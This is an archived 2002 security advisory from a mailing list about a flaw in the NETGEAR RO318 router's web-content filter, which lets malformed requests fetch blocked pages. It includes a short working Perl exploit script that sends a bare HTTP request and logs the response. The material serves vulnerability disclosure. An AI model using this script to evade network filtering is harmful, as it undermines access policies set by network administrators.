[EXPL] NETGEAR RO318 HTTP Filter Vulnerability
From: support@securiteam.comDate: 02/03/02
- Previous message: support@securiteam.com: "[UNIX] Security Vulnerability in Several Versions of DCForum (New Password)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 3 Feb 2002 23:56:25 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
NETGEAR RO318 HTTP Filter Vulnerability
------------------------------------------------------------------------
SUMMARY
NETGEAR's sturdy metal
<http://www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=96> RO318
Cable/DSL Security Router with 8-port switch for the small office network.
Web content filtering options let network administrators establish
restricted access policies - based on the time of day, day of week, Web
address keyword - and receive regular reports and instant alerts via
e-mail on hacker attempts and browsing activities.
The web-filtering component in the firmware only checks for fully
constructed requests and thus sending a malformed request results in the
retrieval of restricted content.
DETAILS
Vulnerable systems:
NetGear RO318 Cable/DSL Security Router
Exploit:
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com
use IO::Socket;
use Getopt::Std;
getopts('h:p:z', \%argv);
if(!defined($argv{h}))
{
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security
\n";
print"Usage: $0 -h <host> -p <port>
\n";
exit;
}
if(defined($argv{h}))
{
&begin
}
sub begin
{
$html = html;
$host = $argv{h};
if(defined $argv{p})
{
$port=$argv{p};
}
else
{
$port = "80";
}
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $host,
PeerPort => "$port")
or die "Connection Refused.\n";
print $socket "GET / HTTP/1.0\n\n";
while (<$socket>)
{
open(LOG, ">>$html");
print (LOG);
}
close $socket;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:nbs@tampabay.rr.com> Null
Byte Security.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Security Vulnerability in Several Versions of DCForum (New Password)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
